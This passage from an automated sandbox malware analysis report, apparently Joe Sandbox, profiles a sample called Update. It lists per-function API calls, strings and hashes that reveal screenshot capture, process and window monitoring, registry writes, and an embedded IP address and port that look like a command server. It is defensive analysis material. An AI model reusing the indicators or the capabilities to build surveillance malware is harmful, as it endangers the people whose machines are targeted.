                                                                                            • CreateThread.KERNEL32(00000000,00000000,6C388770,6C3BC338,00000000,00000000), ref: 6C389E21
                                                                                            • CreateThread.KERNEL32(00000000,00000000,6C3880E0,00000000,00000000,00000000), ref: 6C389E36
                                                                                            • WaitForSingleObject.KERNEL32(00000000,00011170), ref: 6C389E48
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6C389E56
                                                                                            • CreateThread.KERNEL32(00000000,00000000,6C382090,00000000,00000000,00000000), ref: 6C389F65
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateThread_strlen$CloseFileHandleModuleNameObjectSingleWait
                                                                                            • String ID: IiViS$Update.d$Update.d$dll
                                                                                            • API String ID: 632893256-1826472805
                                                                                            • Opcode ID: de2f57e28e0b1f6fc2aa454a6a0aa6e001f00798de6f9d6323e264c8cc1e4533
                                                                                            • Instruction ID: bf09b5295d3a19d1ca3136e81bc79b1916f86511bf10acfeead8d9b0960a1c1b
                                                                                            • Opcode Fuzzy Hash: de2f57e28e0b1f6fc2aa454a6a0aa6e001f00798de6f9d6323e264c8cc1e4533
                                                                                            • Instruction Fuzzy Hash: 8BD116B2D013049FDB14DFA4DC44BEEBBB5AF45304F144528E456A7B80E779AA48CFA2
                                                                                            Function 034E6490 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 144registrystringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E64C2
                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 034E64E2
                                                                                            • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 034E6524
                                                                                            • _memset.LIBCMT ref: 034E6560
                                                                                            • _memset.LIBCMT ref: 034E658E
                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 034E65BA
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 034E65C3
                                                                                            • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 034E65D5
                                                                                            • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 034E6625
                                                                                            • lstrlenW.KERNEL32(?), ref: 034E6635
                                                                                            Strings
                                                                                            • Software\Tencent\Plugin\VAS, xrefs: 034E64D8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                            • String ID: Software\Tencent\Plugin\VAS
                                                                                            • API String ID: 2921034913-3343197220
                                                                                            • Opcode ID: 22bc96cdf68d7b15fd2b1843d8177ad98a1f19b15a5930321bad70b2053754aa
                                                                                            • Instruction ID: 51a399aba149dea667c1e3515c6e833d2e972ffac00652dbafcdebc34f2758cb
                                                                                            • Opcode Fuzzy Hash: 22bc96cdf68d7b15fd2b1843d8177ad98a1f19b15a5930321bad70b2053754aa
                                                                                            • Instruction Fuzzy Hash: DA41CAF5A40318AFD724DB60CD85FEA737CEB44700F0045DAE709BB185EA75AA858F58
                                                                                            Function 034EA460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 150windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 034EA48D
                                                                                            • _malloc.LIBCMT ref: 034EA4D1
                                                                                            • _free.LIBCMT ref: 034EA503
                                                                                            • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 034EA522
                                                                                            • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 034EA594
                                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 034EA59F
                                                                                            • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 034EA5C5
                                                                                            • GdipDisposeImage.GDIPLUS(00000000), ref: 034EA5DD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                            • String ID: &
                                                                                            • API String ID: 2794124522-3042966939
                                                                                            • Opcode ID: 759e532e51bf44f15a6af7288bf800a1677601480616ec1f111977c1dd9fd5f3
                                                                                            • Instruction ID: 0046aea2469512a88e0260d6216f045059276282c4d91740918859b2bf067f72
                                                                                            • Opcode Fuzzy Hash: 759e532e51bf44f15a6af7288bf800a1677601480616ec1f111977c1dd9fd5f3
                                                                                            • Instruction Fuzzy Hash: A35175B6E002159FDB04DFA4C844EEFB7B8EF48305F14855AE915AF350D734A906CBA5
                                                                                            Function 100052B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 123registrysleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                                                                            • RegCloseKey.KERNEL32(?), ref: 100053BB
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 10005434
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                            • String ID: IpDates_info$SOFTWARE
                                                                                            • API String ID: 864241144-2243437601
                                                                                            • Opcode ID: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                                            • Instruction ID: c351098f3a10662c2abe80f3babca39824d4604c0415f8e3891e9891bb32f169
                                                                                            • Opcode Fuzzy Hash: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                                            • Instruction Fuzzy Hash: 184146316442819FF310CF308C45F6B7BB5FB453C6F994068E581CA186D3B2EA42C7A2
                                                                                            Function 100052D9 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 84registrysleepCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                                                                            • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                                                                            • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                                                                            • RegCloseKey.KERNEL32(?), ref: 100053BB
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                                                                            • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                                                                            • Sleep.KERNEL32(00000BB8), ref: 10005434
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565009522.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564959717.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565037672.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565063105.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565159063.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565181608.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                            • String ID: IpDates_info$SOFTWARE
                                                                                            • API String ID: 864241144-2243437601
                                                                                            • Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                                            • Instruction ID: f7f7705b5b84b7b191dcdb77494346d14e222b8940c5b100b936b40375e1b217
                                                                                            • Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                                            • Instruction Fuzzy Hash: B731C1306443819FF315CF308848B6B7BF6FB493C6F9944A8F5859A146D3B2DA46C761
                                                                                            Function 6C388000 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 68COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C389F53,Update.d), ref: 6C388017
                                                                                            • FindResourceW.KERNEL32(00000000,004F0043), ref: 6C388066
                                                                                            • LoadResource.KERNEL32(00000000,00000000), ref: 6C388074
                                                                                            • SizeofResource.KERNEL32(00000000,00000000), ref: 6C38807E
                                                                                            • LockResource.KERNEL32(00000000), ref: 6C388087
                                                                                              • Part of subcall function 6C386B10: _strlen.LIBCMT ref: 6C386B9F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindHandleLoadLockModuleSizeof_strlen
                                                                                            • String ID: C$I$N$T
                                                                                            • API String ID: 415223560-3924500842
                                                                                            • Opcode ID: 8cb2871e6edb7624fb63f0cf0a1682484b477d8d73825d661b85c0f35083d236
                                                                                            • Instruction ID: 79a28fdfe00f75f8ede32d8ba186a3dc1d600c2924b095759980f586099a124e
                                                                                            • Opcode Fuzzy Hash: 8cb2871e6edb7624fb63f0cf0a1682484b477d8d73825d661b85c0f35083d236
                                                                                            • Instruction Fuzzy Hash: 881199B1B053406BD7009B349D49A7B77ECEF9A208F001919F88996241EB79D954CB67
                                                                                            Function 6C3A9BE7 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 6C3A9FEC: CreateFileW.KERNEL32(FFFFFFFF,00000000,?,6C3A9C90,?,?,00000000,?,6C3A9C90,FFFFFFFF,0000000C), ref: 6C3AA009
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3A9CFB
                                                                                            • __dosmaperr.LIBCMT ref: 6C3A9D02
                                                                                            • GetFileType.KERNEL32(00000000), ref: 6C3A9D0E
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C3A9D18
                                                                                            • __dosmaperr.LIBCMT ref: 6C3A9D21
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6C3A9D41
                                                                                            • CloseHandle.KERNEL32(6C3A07FB), ref: 6C3A9E8E
                                                                                            • GetLastError.KERNEL32 ref: 6C3A9EC0
                                                                                            • __dosmaperr.LIBCMT ref: 6C3A9EC7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                            • String ID:
                                                                                            • API String ID: 4237864984-0
                                                                                            • Opcode ID: 24de2dfb6c01d0578d3a86fd32f80aa0e6861ffb7f6be4c095db6e8fd1e3e09b
                                                                                            • Instruction ID: 72f8de6e1e7f579a2015e22b6ff868eba6ddfef50277ecbf342d212e97052d31
                                                                                            • Opcode Fuzzy Hash: 24de2dfb6c01d0578d3a86fd32f80aa0e6861ffb7f6be4c095db6e8fd1e3e09b
                                                                                            • Instruction Fuzzy Hash: F1A13632A146549FCF099FA8DC91BAD3BB4EB07318F14014AE812EB391D7368967CF52
                                                                                            Function 6C382CEC Relevance: 13.1, APIs: 3, Strings: 4, Instructions: 894COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: $,$.$jIk
                                                                                            • API String ID: 4218353326-3923260969
                                                                                            • Opcode ID: 5d157fde0ce29065a6c8901906fe19fe088195657ec5c8275ab1b4f4023d2594
                                                                                            • Instruction ID: 9be96c19f562d1cd4bbb97640ab1a1b83646dcd5824c42ab0cded7360f42ce5b
                                                                                            • Opcode Fuzzy Hash: 5d157fde0ce29065a6c8901906fe19fe088195657ec5c8275ab1b4f4023d2594
                                                                                            • Instruction Fuzzy Hash: 2B82BD71D122688BEB24CF64C8947EDBBB2BF45304F158298D449ABB81DB755EC8CF81
                                                                                            Function 034ECA70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197registryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,035012F8,DF800B7B,00000001,00000000,00000000), ref: 034ECAB1
                                                                                            • RegQueryInfoKeyW.ADVAPI32(035012F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 034ECAE0
                                                                                            • _memset.LIBCMT ref: 034ECB44
                                                                                            • _memset.LIBCMT ref: 034ECB53
                                                                                            • RegEnumValueW.KERNEL32(035012F8,?,00000000,?,00000000,?,00000000,?), ref: 034ECB72
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                              • Part of subcall function 034EF707: std::exception::exception.LIBCMT ref: 034EF756
                                                                                              • Part of subcall function 034EF707: std::exception::exception.LIBCMT ref: 034EF770
                                                                                              • Part of subcall function 034EF707: __CxxThrowException@8.LIBCMT ref: 034EF781
                                                                                            • RegCloseKey.KERNEL32(035012F8,?,?,?,?,?,?,?,?,?,?,?,00000000,035012F8,000000FF), ref: 034ECC83
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                            • String ID: Console\0
                                                                                            • API String ID: 1348767993-1253790388
                                                                                            • Opcode ID: 69c2c6c30cdfb0c75d68748de46553b4f713487c3565e9805fbcd0b68e5b9f7b
                                                                                            • Instruction ID: 2bddf9a9532ba78909b50ae3b93c1d9ec1e75ad816697ad2354d9a22e63f3f50
                                                                                            • Opcode Fuzzy Hash: 69c2c6c30cdfb0c75d68748de46553b4f713487c3565e9805fbcd0b68e5b9f7b
                                                                                            • Instruction Fuzzy Hash: C1614BB5E00218AFDB04DFA9D880EAEB7B8FF48310F14416AE915EB351D735AD01CBA4
                                                                                            Function 034EBB00 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 126COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 034EF707: _malloc.LIBCMT ref: 034EF721
                                                                                            • _memset.LIBCMT ref: 034EBB21
                                                                                            • GetLastInputInfo.USER32(?), ref: 034EBB37
                                                                                            • GetTickCount.KERNEL32 ref: 034EBB3D
                                                                                            • wsprintfW.USER32 ref: 034EBB66
                                                                                            • GetForegroundWindow.USER32 ref: 034EBB6F
                                                                                            • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 034EBB83
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                            • String ID: %d min
                                                                                            • API String ID: 3754759880-1947832151
                                                                                            • Opcode ID: 004c412013ac96320427e75b17cad800ff3908e5cf5e53069e18868bf9481478
                                                                                            • Instruction ID: e8a96f6c961fda3995bb39818fe4bb972767318173c1111f161823e533b3ecc5
                                                                                            • Opcode Fuzzy Hash: 004c412013ac96320427e75b17cad800ff3908e5cf5e53069e18868bf9481478
                                                                                            • Instruction Fuzzy Hash: A741D6B5900218AFCB10DFA4DC88E9FBBB8EF44700F08846AF9099F355D6749A04CBE5
                                                                                            Function 034E6910 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32(DF800B7B,00000000,00000000,75BF73E0,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6938
                                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6947
                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E6960
                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,035010DB,000000FF,?,034E6AB3,00000000), ref: 034E696B
                                                                                            • SysStringLen.OLEAUT32(00000000), ref: 034E69BE
                                                                                            • SysStringLen.OLEAUT32(00000000), ref: 034E69CC
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,035010DB,000000FF), ref: 034E6A2E
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,035010DB,000000FF), ref: 034E6A34
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                            • String ID:
                                                                                            • API String ID: 429299433-0
                                                                                            • Opcode ID: 94a52722ca757f8c1f5e33053a2707a00ece501472db211ea4ffb657d0ef69e3
                                                                                            • Instruction ID: 00d0eb7a7becaff135c56ce0c43827cd4c50a449108c57134c8b185e11e34162
                                                                                            • Opcode Fuzzy Hash: 94a52722ca757f8c1f5e33053a2707a00ece501472db211ea4ffb657d0ef69e3
                                                                                            • Instruction Fuzzy Hash: 6741E5B2D002189FCB10DFA9CC84AAFF7B8FB54305F15462BD915EB340D73959058BA4
                                                                                            Function 6C386B10 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 507COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strlen
                                                                                            • String ID: 134.122.155.39$18852$IP=$Port
                                                                                            • API String ID: 4218353326-2559903092
                                                                                            • Opcode ID: 7b48083fd1c04e0053dde555519fa3b31338291c027e03596048f3f0dda91d73
                                                                                            • Instruction ID: d1e02b02344e79de90c6a861924c3ffbd04379553e0bf49b888ee47dbbcf62ab
                                                                                            • Opcode Fuzzy Hash: 7b48083fd1c04e0053dde555519fa3b31338291c027e03596048f3f0dda91d73
                                                                                            • Instruction Fuzzy Hash: E41282B2A12B008BD734CF34C8947A6B7F6BF89318F154A2DD49A87B80E775E5488B51
                                                                                            Function 6C3880F0 Relevance: 10.7, APIs: 7, Instructions: 180processCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C3880FE
                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 6C388139
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 6C38816C
                                                                                            • _strlen.LIBCMT ref: 6C38818B
                                                                                            • Process32NextW.KERNEL32(?,?), ref: 6C3882EF
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 6C3882FD
                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 6C388313
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3565279383.000000006C371000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C370000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3565257875.000000006C370000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565314087.000000006C3AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565339055.000000006C3BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                            • Associated: 00000003.00000002.3565398695.000000006C3C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_6c370000_Update.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleProcess32$ByteCharCreateFirstMultiNextSnapshotToolhelp32Wide_strlen
                                                                                            • String ID:
                                                                                            • API String ID: 1292832681-0
                                                                                            • Opcode ID: 5362817bc53350211f5ec73c70bae885ad3527cf06b7e021b58002a8a94cb644
                                                                                            • Instruction ID: 93680d72918fbcd7e2c88e5e13ae571c72e8a998450d1fdf17dff902935e6cd5
                                                                                            • Opcode Fuzzy Hash: 5362817bc53350211f5ec73c70bae885ad3527cf06b7e021b58002a8a94cb644
                                                                                            • Instruction Fuzzy Hash: 39513D729063009BE310DF649C80BDFB7D9EF85318F15062AF99997681E771D9088FA3
                                                                                            Function 034E6D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 89registrystringCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • _memset.LIBCMT ref: 034E6DD9
                                                                                            • RegOpenKeyExW.KERNEL32(80000001,03505164,00000000,00020019,75BF73E0), ref: 034E6DFC
                                                                                            • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 034E6E4A
                                                                                            • lstrcmpW.KERNEL32(?,03505148), ref: 034E6E60
                                                                                            • lstrcpyW.KERNEL32(034E56EA,?), ref: 034E6E72
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_3_2_34e0000_Update.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                            • String ID: GROUP
                                                                                            • API String ID: 2102619503-2593425013
                                                                                            • Opcode ID: 5a09c1d382a454d8433a3834c1a743e01dc13cdaaf3f2a914cc16d8d46ab895b
                                                                                            • Instruction ID: acbdf1c5a58432053e26e1a8e41da09fa3fa7522f1f2674b32b4c6cb89b59775
                                                                                            • Opcode Fuzzy Hash: 5a09c1d382a454d8433a3834c1a743e01dc13cdaaf3f2a914cc16d8d46ab895b
                                                                                            • Instruction Fuzzy Hash: 7431C471900318AFDB20DF94DC8DF9EB7B8EB08714F140299E519AA2D0DB79AA84CF54
                                                                                            Function 034EFA29 Relevance: 10.6, APIs: 7, Instructions: 63threadCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ___set_flsgetvalue.LIBCMT ref: 034EFA4E
                                                                                            • __calloc_crt.LIBCMT ref: 034EFA5A
                                                                                            • __getptd.LIBCMT ref: 034EFA67
                                                                                            • CreateThread.KERNEL32(?,?,034EF9C4,00000000,?,?), ref: 034EFA9E
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 034EFAA8
                                                                                            • _free.LIBCMT ref: 034EFAB1
                                                                                            • __dosmaperr.LIBCMT ref: 034EFABC
                                                                                              • Part of subcall function 034EF91B: __getptd_noexit.LIBCMT ref: 034EF91B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000003.00000002.3564372640.00000000034E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034E0000, based on PE: true
                                                                                            • Associated: 00000003.00000002.3564372640.0000000003514000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
